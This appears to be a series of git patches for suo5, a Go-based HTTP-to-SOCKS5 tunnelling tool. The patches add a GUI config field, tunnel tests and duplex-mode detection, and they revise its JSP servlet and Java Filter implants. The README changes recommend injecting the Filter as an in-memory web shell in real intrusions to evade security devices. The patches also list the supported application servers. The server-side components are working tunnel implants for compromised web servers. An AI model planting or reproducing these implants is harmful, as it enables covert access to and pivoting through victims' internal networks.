GetStatus():Promise; +export function GetStatus():Promise; -export function RunSuo5WithConfig(arg1:any):Promise; +export function RunSuo5WithConfig(arg1:ctrl.Suo5Config):Promise; export function Stop():Promise; diff --git a/gui/frontend/wailsjs/go/models.ts b/gui/frontend/wailsjs/go/models.ts index 509bc77..5701816 100644 --- a/gui/frontend/wailsjs/go/models.ts +++ b/gui/frontend/wailsjs/go/models.ts @@ -15,6 +15,7 @@ export namespace ctrl { redirect_url: string; raw_header: string[]; disable_heartbeat: boolean; + disable_gzip: boolean; static createFrom(source: any = {}) { return new Suo5Config(source); @@ -36,6 +37,7 @@ export namespace ctrl { this.redirect_url = source["redirect_url"]; this.raw_header = source["raw_header"]; this.disable_heartbeat = source["disable_heartbeat"]; + this.disable_gzip = source["disable_gzip"]; } } diff --git a/gui/go.mod b/gui/go.mod index 0b1e519..e1fc6c6 100644 --- a/gui/go.mod +++ b/gui/go.mod @@ -4,7 +4,7 @@ go 1.18 require ( github.com/shirou/gopsutil/v3 v3.23.3 - github.com/wailsapp/wails/v2 v2.4.1 + github.com/wailsapp/wails/v2 v2.5.1 github.com/zema1/suo5 v0.0.0-00010101000000-000000000000 ) diff --git a/gui/go.sum b/gui/go.sum index 57df317..5b05097 100644 --- a/gui/go.sum +++ b/gui/go.sum @@ -109,8 +109,8 @@ github.com/valyala/fasttemplate v1.2.2 h1:lxLXG0uE3Qnshl9QyaK6XJxMXlQZELvChBOCmQ github.com/valyala/fasttemplate v1.2.2/go.mod h1:KHLXt3tVN2HBp8eijSv/kGJopbvo7S+qRAEEKiv+SiQ= github.com/wailsapp/mimetype v1.4.1 h1:pQN9ycO7uo4vsUUuPeHEYoUkLVkaRntMnHJxVwYhwHs= github.com/wailsapp/mimetype v1.4.1/go.mod h1:9aV5k31bBOv5z6u+QP8TltzvNGJPmNJD4XlAL3U+j3o= -github.com/wailsapp/wails/v2 v2.4.1 h1:Ns7MOKWQM6l0ttBxpd5VcgYrH+GNPOnoDfnsBpbDnzM= -github.com/wailsapp/wails/v2 v2.4.1/go.mod h1:jbOZbcr/zm79PxXxAjP8UoVlDd9wLW3uDs+isIthDfs= +github.com/wailsapp/wails/v2 v2.5.1 h1:mfG+2kWqQXYOwdgI43HEILjOZDXbk5woPYI3jP2b+js= +github.com/wailsapp/wails/v2 v2.5.1/go.mod h1:jbOZbcr/zm79PxXxAjP8UoVlDd9wLW3uDs+isIthDfs= github.com/yusufpapurcu/wmi v1.2.2 h1:KBNDSne4vP5mbSWnJbO+51IMOXJB67QiYCSBrubbPRg= github.com/yusufpapurcu/wmi v1.2.2/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0= github.com/zema1/rawhttp v0.0.0-20221102031338-134c5669760c h1:vSrYC77zzwoHrtOywMFlYlhjhDWDZWaWTitSrUh1O58= From 0758573a5c77ebf0005a02f21c2164d83b333e14 Mon Sep 17 00:00:00 2001 From: zema1 Date: Wed, 17 May 2023 17:49:20 +0800 Subject: [PATCH 06/11] feat: improve tunnel check close https://github.com/zema1/suo5/issues/22 --- assets/suo5.jsp | 37 +++++++----- ctrl/config.go | 2 +- ctrl/ctrl.go | 145 +++++++++++++++++++++++++++++------------------- ctrl/handler.go | 5 +- go.mod | 10 ++-- go.sum | 8 +++ 6 files changed, 127 insertions(+), 80 deletions(-) diff --git a/assets/suo5.jsp b/assets/suo5.jsp index 38d3013..ad006be 100644 --- a/assets/suo5.jsp +++ b/assets/suo5.jsp @@ -213,8 +213,7 @@ private void processDataBio(HttpServletRequest request, HttpServletResponse resp) throws Exception { final InputStream reqInputStream = request.getInputStream(); - HashMap dataMap; - dataMap = unmarshal(reqInputStream); + HashMap dataMap = unmarshal(reqInputStream); byte[] action = (byte[]) dataMap.get("ac"); if (action.length != 1 || action[0] != 0x00) { @@ -226,10 +225,13 @@ // 0x00 create socket resp.setHeader("X-Accel-Buffering", "no"); - String host = new String((byte[]) dataMap.get("h")); - int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); Socket sc; try { + String host = new String((byte[]) dataMap.get("h")); + int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); + if (port == 0) { + port = request.getLocalPort(); + } sc = new Socket(); sc.connect(new InetSocketAddress(host, port), 5000); } catch (Exception e) { @@ -284,20 +286,21 @@ HashMap dataMap; dataMap = unmarshal(bufInputStream); - byte[] action = (byte[]) dataMap.get("ac"); - if (action.length != 1) { + byte[] actions = (byte[]) dataMap.get("ac"); + if (actions.length != 1) { return; } - if (action[0] == 0x02) { + byte action = actions[0]; + if (action == 0x02) { socketOutStream.close(); return; - } else if (action[0] == 0x01) { + } else if (action == 0x01) { byte[] data = (byte[]) dataMap.get("dt"); if (data.length != 0) { socketOutStream.write(data); socketOutStream.flush(); } - } else if (action[0] == 0x03) { + } else if (action == 0x03) { continue; } else { return; @@ -314,8 +317,8 @@ String clientId = new String((byte[]) dataMap.get("id")); - byte[] action = (byte[]) dataMap.get("ac"); - if (action.length != 1) { + byte[] actions = (byte[]) dataMap.get("ac"); + if (actions.length != 1) { resp.setStatus(403); return; } @@ -325,6 +328,7 @@ ActionDelete byte = 0x02 ActionHeartbeat byte = 0x03 */ + byte action = actions[0]; byte[] redirectData = (byte[]) dataMap.get("r"); boolean needRedirect = redirectData != null && redirectData.length > 0; String redirectUrl = ""; @@ -335,7 +339,7 @@ } // load balance, send request with data to request url // action 0x00 need to pipe, see below - if (needRedirect && action[0] >= 0x01 && action[0] <= 0x03) { + if (needRedirect && action >= 0x01 && action <= 0x03) { HttpURLConnection conn = redirect(request, dataMap, redirectUrl); conn.disconnect(); return; @@ -343,13 +347,13 @@ resp.setBufferSize(512); OutputStream respOutStream = resp.getOutputStream(); - if (action[0] == 0x02) { + if (action == 0x02) { Object o = this.get(clientId); if (o == null) return; OutputStream scOutStream = (OutputStream) o; scOutStream.close(); return; - } else if (action[0] == 0x01) { + } else if (action == 0x01) { Object o = this.get(clientId); if (o == null) { respOutStream.write(marshal(newDel())); @@ -368,13 +372,16 @@ } else { } - if (action[0] != 0x00) { + if (action != 0x00) { return; } // 0x00 create new tunnel resp.setHeader("X-Accel-Buffering", "no"); String host = new String((byte[]) dataMap.get("h")); int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); + if (port == 0) { + port = request.getLocalPort(); + } InputStream readFrom; Socket sc = null; diff --git a/ctrl/config.go b/ctrl/config.go index e42669f..15b719f 100644 --- a/ctrl/config.go +++ b/ctrl/config.go @@ -23,9 +23,9 @@ type Suo5Config struct { RawHeader []string `json:"raw_header"` DisableHeartbeat bool `json:"disable_heartbeat"` DisableGzip bool `json:"disable_gzip"` + TestExit string `json:"-"` Header http.Header `json:"-"` - TestExit string `json:"-"` OnRemoteConnected func(e *ConnectedEvent) `json:"-"` OnNewClientConnection func(event *ClientConnectionEvent) `json:"-"` OnClientConnectionClose func(event *ClientConnectCloseEvent) `json:"-"` diff --git a/ctrl/ctrl.go b/ctrl/ctrl.go index 60c9e9c..9e403af 100644 --- a/ctrl/ctrl.go +++ b/ctrl/ctrl.go @@ -4,6 +4,8 @@ import ( "context" "crypto/tls" "fmt" + "github.com/go-gost/gosocks5" + "github.com/go-gost/gosocks5/client" "github.com/go-gost/gosocks5/server" log "github.com/kataras/golog" "github.com/kataras/pio" @@ -86,24 +88,27 @@ func Run(ctx context.Context, config *Suo5Config) error { log.Infof("header: %s", config.headerString()) log.Infof("method: %s", config.Method) - - log.Infof("testing connection with remote server") - err = checkBasicConnect(normalClient, config.Method, config.Target, config.Header.Clone()) + log.Infof("connecting to target %s", config.Target) + result, err := checkConnectMode(config.Method, config.Target, config.Header.Clone()) if err != nil { return err } - log.Infof("connection to remote server successful") - if config.Mode == AutoDuplex || config.Mode == FullDuplex { - log.Infof("checking the capability of FullDuplex..") - if checkFullDuplex(config.Method, config.Target, config.Header.Clone()) { - config.Mode = FullDuplex + if config.Mode == AutoDuplex { + config.Mode = result + if result == FullDuplex { log.Infof("wow, you can run the proxy on FullDuplex mode") } else { - config.Mode = HalfDuplex log.Warnf("the target may behind a reverse proxy, fallback to HalfDuplex mode") } + } else { + if result == FullDuplex && config.Mode == HalfDuplex { + log.Infof("the target support full duplex, you can try FullDuplex mode to obtain better performance") + } else if result == HalfDuplex && config.Mode == FullDuplex { + return fmt.Errorf("the target doesn't support full duplex, you should use HalfDuplex or AutoDuplex mode") + } } - log.Infof("tunnel created at mode %s!", config.Mode) + + log.Infof("starting tunnel at %s", config.Listen) if config.OnRemoteConnected != nil { config.OnRemoteConnected(&ConnectedEvent{Mode: config.Mode}) } @@ -164,50 +169,32 @@ func Run(ctx context.Context, config *Suo5Config) error { OnClientConnectionClose: config.OnClientConnectionClose, }) }() + log.Infof("creating a test connection to the remote target") + ok := testTunnel(config.Listen, config.Username, config.Password, time.Second*2) + time.Sleep(time.Millisecond * 500) + if !ok { + if !config.DisableGzip { + log.Warnf("tunnel test failed") + log.Warnf("you can still use the tunnel or retry with --no-gzip to improve compatibility") + } else { + log.Warnf("tunnel test failed, suo5 can not work on this server, there may be other reverse proxies running on the target") + } + } else { + log.Infof("congratulations! everything works fine") + } if config.TestExit != "" { - time.Sleep(time.Second * 1) - if err := testConnection(socks5Addr, config.TestExit, time.Second*15); err != nil { + if err := testAndExit(socks5Addr, config.TestExit, time.Second*15); err != nil { return errors.Wrap(err, "test connection failed") } - // exit(0) return nil } - <-ctx.Done() - return nil -} - -func checkBasicConnect(client *http.Client, method string, target string, baseHeader http.Header) error { - data := RandString(64) - req, err := http.NewRequest(method, target, strings.NewReader(data)) - if err != nil { - return fmt.Errorf("invalid target url, %s", err) - } - req.Header = baseHeader.Clone() - req.Header.Set("Content-Type", ContentTypeChecking) - resp, err := client.Do(req) - if err != nil { - return fmt.Errorf("failed to connect to %s", target) - } - defer resp.Body.Close() - - body, err := ioutil.ReadAll(resp.Body) - if err != nil { - return err - } - - // 如果是数据末尾的换行,并不影响使用 - b := strings.TrimRight(string(body), "\r\n") - if len(b) < 32 || !strings.HasPrefix(data, b) { - header, _ := httputil.DumpResponse(resp, false) - log.Errorf("response are as follows:\n%s", string(header)+string(body)) - return fmt.Errorf("got unexpected body, remote server test failed") - } + <-ctx.Done() return nil } -func checkFullDuplex(method string, target string, baseHeader http.Header) bool { +func checkConnectMode(method string, target string, baseHeader http.Header) (ConnectionType, error) { // 这里的 client 需要定义 timeout,不要用外面没有 timeout 的 rawCient rawClient := rawhttp.NewClient(&rawhttp.Options{ Timeout: 5 * time.Second, @@ -220,40 +207,82 @@ func checkFullDuplex(method string, target string, baseHeader http.Header) bool data := RandString(32) ch := make(chan []byte, 1) ch <- []byte(data) - go func() { - // timeout - time.Sleep(time.Second * 3) - close(ch) - }() req, err := http.NewRequest(method, target, netrans.NewChannelReader(ch)) if err != nil { - return false + return Undefined, err } req.Header = baseHeader.Clone() req.Header.Set("Content-Type", ContentTypeChecking) + + now := time.Now() + go func() { + // timeout + time.Sleep(time.Second * 3) + close(ch) + }() resp, err := rawClient.Do(req) if err != nil { - return false + return Undefined, err } defer resp.Body.Close() - // 如果此时能立马读取到响应,说明请求没有被缓存, 那么就可以变成全双工的 + // 如果独到响应的时间在3s内,说明请求没有被缓存, 那么就可以变成全双工的 body, err := ioutil.ReadAll(resp.Body) if err != nil { - return false + return Undefined, err } + duration := time.Since(now).Milliseconds() + b := strings.TrimRight(string(body), "\r\n") - return len(b) >= 32 && strings.HasPrefix(data, b) + if len(b) >= 32 && strings.HasPrefix(data, b) { + if duration < 3000 { + return FullDuplex, nil + } else { + return HalfDuplex, nil + } + } + + header, _ := httputil.DumpResponse(resp, false) + log.Errorf("response are as follows:\n%s", string(header)+string(body)) + return Undefined, fmt.Errorf("got unexpected body, remote server test failed") +} + +// 检查代理是否真正有效, 只要能按有响应即可,尝试连一下 server 的 LocalPort, 这里写 0,在 jsp 里有判断 +func testTunnel(socks5, username, password string, timeout time.Duration) bool { + addr, _ := gosocks5.NewAddr("127.0.0.1:0") + options := []client.DialOption{client.TimeoutDialOption(timeout)} + if username != "" && password != "" { + options = append(options, client.SelectorDialOption(client.NewClientSelector(url.UserPassword(username, password)))) + } + + conn, err := client.Dial(socks5, options...) + if err != nil { + log.Error(err) + return false + } + defer conn.Close() + if err := gosocks5.NewRequest(gosocks5.CmdConnect, addr).Write(conn); err != nil { + log.Error(err) + return false + } + _ = conn.SetReadDeadline(time.Now().Add(timeout)) + + reply, err := gosocks5.ReadReply(conn) + if err != nil { + log.Error(err) + return false + } + log.Debugf("recv socks5 reply: %d", reply.Rep) + return reply.Rep == gosocks5.Succeeded || reply.Rep == gosocks5.ConnRefused } -// 检查代理是否真正有效, 只要能按有响应即可,无论目标是否能连通 -func testConnection(socks5 string, remote string, timeout time.Duration) error { +func testAndExit(socks5 string, remote string, timeout time.Duration) error { log.Infof("checking connection to %s using %s", remote, socks5) u, err := url.Parse(socks5) if err != nil { return err } - client := http.Client{ + httpClient := http.Client{ Timeout: timeout, Transport: &http.Transport{ Proxy: http.ProxyURL(u), @@ -264,7 +293,7 @@ func testConnection(socks5 string, remote string, timeout time.Duration) error { return err } req.Close = true - resp, err := client.Do(req) + resp, err := httpClient.Do(req) if err != nil { if os.IsTimeout(err) { return err diff --git a/ctrl/handler.go b/ctrl/handler.go index 47be118..253b88b 100644 --- a/ctrl/handler.go +++ b/ctrl/handler.go @@ -20,6 +20,7 @@ import ( type ConnectionType string const ( + Undefined ConnectionType = "undefined" AutoDuplex ConnectionType = "auto" FullDuplex ConnectionType = "full" HalfDuplex ConnectionType = "half" @@ -113,7 +114,9 @@ func (m *socks5Handler) handleConnect(conn net.Conn, sockReq *gosocks5.Request) } status := serverData["s"] if len(status) != 1 || status[0] != 0x00 { - log.Errorf("connection refused to %s", sockReq.Addr) + if sockReq.Addr.Port != 0 { + log.Errorf("connection refused to %s", sockReq.Addr) + } rep := gosocks5.NewReply(gosocks5.ConnRefused, nil) _ = rep.Write(conn) return diff --git a/go.mod b/go.mod index 7ed6e10..3292073 100644 --- a/go.mod +++ b/go.mod @@ -7,7 +7,7 @@ require ( github.com/kataras/golog v0.1.8 github.com/kataras/pio v0.0.11 github.com/pkg/errors v0.9.1 - github.com/stretchr/testify v1.8.1 + github.com/stretchr/testify v1.8.2 github.com/urfave/cli/v2 v2.25.1 github.com/zema1/rawhttp v0.0.0-20221102031338-134c5669760c ) @@ -20,13 +20,13 @@ require ( github.com/gorilla/css v1.0.0 // indirect github.com/microcosm-cc/bluemonday v1.0.23 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect - github.com/projectdiscovery/retryablehttp-go v1.0.14 // indirect - github.com/projectdiscovery/utils v0.0.19 // indirect + github.com/projectdiscovery/retryablehttp-go v1.0.16 // indirect + github.com/projectdiscovery/utils v0.0.31 // indirect github.com/russross/blackfriday/v2 v2.1.0 // indirect github.com/saintfish/chardet v0.0.0-20230101081208-5e3ef4b5456d // indirect github.com/xrash/smetrics v0.0.0-20201216005158-039620a65673 // indirect - golang.org/x/net v0.9.0 // indirect - golang.org/x/sys v0.7.0 // indirect + golang.org/x/net v0.10.0 // indirect + golang.org/x/sys v0.8.0 // indirect golang.org/x/text v0.9.0 // indirect gopkg.in/yaml.v3 v3.0.1 // indirect ) diff --git a/go.sum b/go.sum index ff095c7..de8eea2 100644 --- a/go.sum +++ b/go.sum @@ -33,10 +33,14 @@ github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZN github.com/projectdiscovery/retryablehttp-go v1.0.2/go.mod h1:dx//aY9V247qHdsRf0vdWHTBZuBQ2vm6Dq5dagxrDYI= github.com/projectdiscovery/retryablehttp-go v1.0.14 h1:PJaHQtHWE00xrmryZwhtma2b72GbkfA9gJM0yIR9ENY= github.com/projectdiscovery/retryablehttp-go v1.0.14/go.mod h1:L5HwtGSvc0E3dNVtVqPACWOmr21Bbop2ZhpbCPYEeYU= +github.com/projectdiscovery/retryablehttp-go v1.0.16 h1:xrEK9VVkLf0eN4bYOTc2Pg0qRqz47g8T823vqpCIsl8= +github.com/projectdiscovery/retryablehttp-go v1.0.16/go.mod h1:9m76To4lNgBtVfqADzLxZg1wWajv6y/uYMWCOs1Olo8= github.com/projectdiscovery/stringsutil v0.0.0-20210830151154-f567170afdd9 h1:xbL1/7h0k6HE3RzPdYk9W/8pUxESrGWewTaZdIB5Pes= github.com/projectdiscovery/stringsutil v0.0.0-20210830151154-f567170afdd9/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I= github.com/projectdiscovery/utils v0.0.19 h1:5m70xVhBq86h5KsOMVWSO0H+PTmkwlOGAekWcHsaTxI= github.com/projectdiscovery/utils v0.0.19/go.mod h1:Cu216AlQ7rAYa8aDBqB2OgNfu5p24Uj+tG9RxV8Wbfs= +github.com/projectdiscovery/utils v0.0.31 h1:IgwzYpqLLYSA8aMq5JCoErH8Fqo/bsl78+Yxj5uX1aY= +github.com/projectdiscovery/utils v0.0.31/go.mod h1:CmTHhNchGCzuxED52xx8LuzlP144LOgoNCBQ8WTZ0ks= github.com/russross/blackfriday/v2 v2.1.0 h1:JIOH55/0cWyOuilr9/qlrm0BSXldqnqwMsf35Ld67mk= github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= github.com/saintfish/chardet v0.0.0-20230101081208-5e3ef4b5456d h1:hrujxIzL1woJ7AwssoOcM/tq5JjjG2yYOc8odClEiXA= @@ -49,6 +53,7 @@ github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/ github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= github.com/stretchr/testify v1.8.1 h1:w7B6lhMri9wdJUVmEZPGGhZzrYTPvgJArz7wNPgYKsk= github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= +github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/urfave/cli/v2 v2.25.1 h1:zw8dSP7ghX0Gmm8vugrs6q9Ku0wzweqPyshy+syu9Gw= github.com/urfave/cli/v2 v2.25.1/go.mod h1:GHupkWPMM0M/sj1a2b4wUrWBPzazNrIjouW6fmdJLxc= github.com/xrash/smetrics v0.0.0-20201216005158-039620a65673 h1:bAn7/zixMGCfxrRTfdpNzjtPYqr8smhKouy9mxVdGPU= @@ -59,10 +64,13 @@ golang.org/x/net v0.0.0-20210521195947-fe42d452be8f/go.mod h1:9nx3DQGgdP8bBQD5qx golang.org/x/net v0.0.0-20211216030914-fe4d6282115f/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.9.0 h1:aWJ/m6xSmxWBx+V0XRHTlrYrPG56jKsLdTFmsSsCzOM= golang.org/x/net v0.9.0/go.mod h1:d48xBJpPfHeWQsugry2m+kC02ZBRGRgulfHnEXEuWns= +golang.org/x/net v0.10.0 h1:X2//UzNDwYmtCLn7To6G58Wr6f5ahEAQgKNzv9Y951M= +golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.7.0 h1:3jlCCIQZPdOYu1h8BkNvLz8Kgwtae2cagcG/VamtZRU= golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.8.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= From 3590886a7f7f5c94ba8a2883f9ec57d5bcaa1870 Mon Sep 17 00:00:00 2001 From: zema1 Date: Wed, 17 May 2023 20:19:09 +0800 Subject: [PATCH 07/11] feat: update assets readme --- assets/README.md | 10 +--- assets/Suo5Filter.java | 117 +++++++++++++++++++++++------------------ go.sum | 12 +---- 3 files changed, 70 insertions(+), 69 deletions(-) diff --git a/assets/README.md b/assets/README.md index 41f1670..79b97bf 100644 --- a/assets/README.md +++ b/assets/README.md @@ -5,7 +5,7 @@ 实战中推荐使用内存马的方式来加载, jsp 的方式容易被安全设备检测到。 - `suo5.jsp` servlet 的实现 -- `Suo5Filter.java` 一个简易的 Filter 实现,可以用于 Filter 内存马注入 +- `Suo5Filter.java` 一个简易的 Filter 实现,可以改造后用于 Filter 型内存马注入 如果想要其他版本的,可以利用 git 的 release tag 进入。 @@ -17,10 +17,4 @@ - Weblogic 10,12,14 - Jboss 4,6 - Jetty 9,10,11 - -除非明确列出不支持,否则基本都没问题,如果有问题,可以提 issue 或加群讨论。 - -## 暂不支持的中间件 - -- WebSphere - +- WebSphere 8,9,22,23 \ No newline at end of file diff --git a/assets/Suo5Filter.java b/assets/Suo5Filter.java index c68351d..db11402 100644 --- a/assets/Suo5Filter.java +++ b/assets/Suo5Filter.java @@ -15,8 +15,10 @@ import java.util.Enumeration; import java.util.HashMap; -public class Suo5Filter implements Runnable, HostnameVerifier, X509TrustManager, Filter { - static HashMap addrs = collectAddr(); +public class Suo5Filter implements Filter, Runnable, HostnameVerifier, X509TrustManager { + + public static HashMap addrs = collectAddr(); + public static HashMap ctx = new HashMap(); InputStream gInStream; OutputStream gOutStream; @@ -68,26 +70,20 @@ public void doFilter(ServletRequest sReq, ServletResponse sResp, FilterChain cha } } - public void readInputStreamWithTimeout(InputStream is, byte[] b, int timeoutMillis) throws IOException, InterruptedException { + public void readFull(InputStream is, byte[] b) throws IOException, InterruptedException { int bufferOffset = 0; - long maxTimeMillis = new Date().getTime() + timeoutMillis; - while (new Date().getTime() < maxTimeMillis && bufferOffset < b.length) { + while (bufferOffset < b.length) { int readLength = b.length - bufferOffset; - if (is.available() < readLength) { - readLength = is.available(); - } - // can alternatively use bufferedReader, guarded by isReady(): int readResult = is.read(b, bufferOffset, readLength); if (readResult == -1) break; bufferOffset += readResult; - Thread.sleep(200); } } public void tryFullDuplex(HttpServletRequest request, HttpServletResponse response) throws IOException, InterruptedException { InputStream in = request.getInputStream(); byte[] data = new byte[32]; - readInputStreamWithTimeout(in, data, 2000); + readFull(in, data); OutputStream out = response.getOutputStream(); out.write(data); out.flush(); @@ -136,6 +132,18 @@ int bytesToU32(byte[] bytes) { ((bytes[3] & 0xFF) << 0); } + synchronized void put(String k, Object v) { + ctx.put(k, v); + } + + synchronized Object get(String k) { + return ctx.get(k); + } + + synchronized Object remove(String k) { + return ctx.remove(k); + } + byte[] copyOfRange(byte[] original, int from, int to) { int newLength = to - from; if (newLength < 0) { @@ -178,9 +186,8 @@ private byte[] marshal(HashMap m) throws IOException { } private HashMap unmarshal(InputStream in) throws Exception { - DataInputStream reader = new DataInputStream(in); byte[] header = new byte[4 + 1]; // size and datatype - reader.readFully(header); + readFull(in, header); // read full ByteBuffer bb = ByteBuffer.wrap(header); int len = bb.getInt(); @@ -189,7 +196,7 @@ private HashMap unmarshal(InputStream in) throws Exception { throw new IOException("invalid len"); } byte[] bs = new byte[len]; - reader.readFully(bs); + readFull(in, bs); for (int i = 0; i < bs.length; i++) { bs[i] = (byte) (bs[i] ^ x); } @@ -231,24 +238,25 @@ private HashMap unmarshal(InputStream in) throws Exception { private void processDataBio(HttpServletRequest request, HttpServletResponse resp) throws Exception { final InputStream reqInputStream = request.getInputStream(); - final BufferedInputStream reqReader = new BufferedInputStream(reqInputStream); - HashMap dataMap; - dataMap = unmarshal(reqReader); + HashMap dataMap = unmarshal(reqInputStream); byte[] action = (byte[]) dataMap.get("ac"); if (action.length != 1 || action[0] != 0x00) { resp.setStatus(403); return; } - resp.setBufferSize(8 * 1024); + resp.setBufferSize(512); final OutputStream respOutStream = resp.getOutputStream(); // 0x00 create socket resp.setHeader("X-Accel-Buffering", "no"); - String host = new String((byte[]) dataMap.get("h")); - int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); Socket sc; try { + String host = new String((byte[]) dataMap.get("h")); + int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); + if (port == 0) { + port = request.getLocalPort(); + } sc = new Socket(); sc.connect(new InetSocketAddress(host, port), 5000); } catch (Exception e) { @@ -260,6 +268,7 @@ private void processDataBio(HttpServletRequest request, HttpServletResponse resp respOutStream.write(marshal(newStatus((byte) 0x00))); respOutStream.flush(); + resp.flushBuffer(); final OutputStream scOutStream = sc.getOutputStream(); final InputStream scInStream = sc.getInputStream(); @@ -269,7 +278,7 @@ private void processDataBio(HttpServletRequest request, HttpServletResponse resp Suo5Filter p = new Suo5Filter(scInStream, respOutStream); t = new Thread(p); t.start(); - readReq(reqReader, scOutStream); + readReq(reqInputStream, scOutStream); } catch (Exception e) { // System.out.printf("pipe error, %s\n", e); } finally { @@ -283,7 +292,6 @@ private void processDataBio(HttpServletRequest request, HttpServletResponse resp private void readSocket(InputStream inputStream, OutputStream outputStream, boolean needMarshal) throws IOException { byte[] readBuf = new byte[1024 * 8]; - while (true) { int n = inputStream.read(readBuf); if (n <= 0) { @@ -298,25 +306,26 @@ private void readSocket(InputStream inputStream, OutputStream outputStream, bool } } - private void readReq(BufferedInputStream bufInputStream, OutputStream socketOutStream) throws Exception { + private void readReq(InputStream bufInputStream, OutputStream socketOutStream) throws Exception { while (true) { HashMap dataMap; dataMap = unmarshal(bufInputStream); - byte[] action = (byte[]) dataMap.get("ac"); - if (action.length != 1) { + byte[] actions = (byte[]) dataMap.get("ac"); + if (actions.length != 1) { return; } - if (action[0] == 0x02) { + byte action = actions[0]; + if (action == 0x02) { socketOutStream.close(); return; - } else if (action[0] == 0x01) { + } else if (action == 0x01) { byte[] data = (byte[]) dataMap.get("dt"); if (data.length != 0) { socketOutStream.write(data); socketOutStream.flush(); } - } else if (action[0] == 0x03) { + } else if (action == 0x03) { continue; } else { return; @@ -327,15 +336,14 @@ private void readReq(BufferedInputStream bufInputStream, OutputStream socketOutS private void processDataUnary(HttpServletRequest request, HttpServletResponse resp) throws Exception { InputStream is = request.getInputStream(); - ServletContext ctx = request.getSession().getServletContext(); BufferedInputStream reader = new BufferedInputStream(is); HashMap dataMap; dataMap = unmarshal(reader); String clientId = new String((byte[]) dataMap.get("id")); - byte[] action = (byte[]) dataMap.get("ac"); - if (action.length != 1) { + byte[] actions = (byte[]) dataMap.get("ac"); + if (actions.length != 1) { resp.setStatus(403); return; } @@ -345,6 +353,7 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re ActionDelete byte = 0x02 ActionHeartbeat byte = 0x03 */ + byte action = actions[0]; byte[] redirectData = (byte[]) dataMap.get("r"); boolean needRedirect = redirectData != null && redirectData.length > 0; String redirectUrl = ""; @@ -355,28 +364,29 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re } // load balance, send request with data to request url // action 0x00 need to pipe, see below - if (needRedirect && action[0] >= 0x01 && action[0] <= 0x03) { + if (needRedirect && action >= 0x01 && action <= 0x03) { HttpURLConnection conn = redirect(request, dataMap, redirectUrl); conn.disconnect(); return; } - resp.setBufferSize(8 * 1024); + resp.setBufferSize(512); OutputStream respOutStream = resp.getOutputStream(); - if (action[0] == 0x02) { - OutputStream scOutStream = (OutputStream) ctx.getAttribute(clientId); - if (scOutStream != null) { - scOutStream.close(); - } + if (action == 0x02) { + Object o = this.get(clientId); + if (o == null) return; + OutputStream scOutStream = (OutputStream) o; + scOutStream.close(); return; - } else if (action[0] == 0x01) { - OutputStream scOutStream = (OutputStream) ctx.getAttribute(clientId); - if (scOutStream == null) { + } else if (action == 0x01) { + Object o = this.get(clientId); + if (o == null) { respOutStream.write(marshal(newDel())); respOutStream.flush(); respOutStream.close(); return; } + OutputStream scOutStream = (OutputStream) o; byte[] data = (byte[]) dataMap.get("dt"); if (data.length != 0) { scOutStream.write(data); @@ -387,13 +397,16 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re } else { } - if (action[0] != 0x00) { + if (action != 0x00) { return; } // 0x00 create new tunnel resp.setHeader("X-Accel-Buffering", "no"); String host = new String((byte[]) dataMap.get("h")); int port = Integer.parseInt(new String((byte[]) dataMap.get("p"))); + if (port == 0) { + port = request.getLocalPort(); + } InputStream readFrom; Socket sc = null; @@ -409,22 +422,24 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re sc = new Socket(); sc.connect(new InetSocketAddress(host, port), 5000); readFrom = sc.getInputStream(); - ctx.setAttribute(clientId, sc.getOutputStream()); + this.put(clientId, sc.getOutputStream()); respOutStream.write(marshal(newStatus((byte) 0x00))); respOutStream.flush(); + resp.flushBuffer(); } catch (Exception e) { - ctx.removeAttribute(clientId); +// System.out.printf("connect error %s\n", e); +// e.printStackTrace(); + this.remove(clientId); respOutStream.write(marshal(newStatus((byte) 0x01))); respOutStream.flush(); respOutStream.close(); return; } } - try { readSocket(readFrom, respOutStream, !needRedirect); } catch (Exception e) { -// System.out.printf("pipe error, %s\n", e); +// 